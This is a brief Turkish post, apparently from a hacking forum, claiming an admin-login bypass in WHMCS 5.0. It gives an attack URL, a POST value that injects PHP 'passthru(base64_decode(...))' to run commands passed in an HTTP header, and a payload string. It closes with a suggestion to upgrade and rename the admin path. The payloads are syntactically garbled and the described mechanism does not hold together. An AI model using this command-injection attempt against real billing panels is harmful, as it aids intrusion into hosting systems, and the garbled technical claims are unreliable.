| whmcs 5.x güvenlik açığı
whmcs 5.0 sürümünde bir güvenlik açığı mevcut, ancak 5.1'de önbellek güvenlik eklentisi eklendi.
http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}
eğer önbellek doğrulama yok ise (5.0 sürümünde eksik) sayfa yüklenmeye çalışacak ve tamper data veya benzeri bir modül ile POST_SESSION değeri aşağıdaki gibi değiştirildiğinde yönetici sayfası açılacaktır.
POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";
PAYLOAD: $payload = "login=1&title=1&execorder=0&hook=urlencoded&r edir ect={admin_index}";
şuan için olası çözüm olarak sürüm yükseltilebilir ve admin panel yolu değiştirilebilir,
|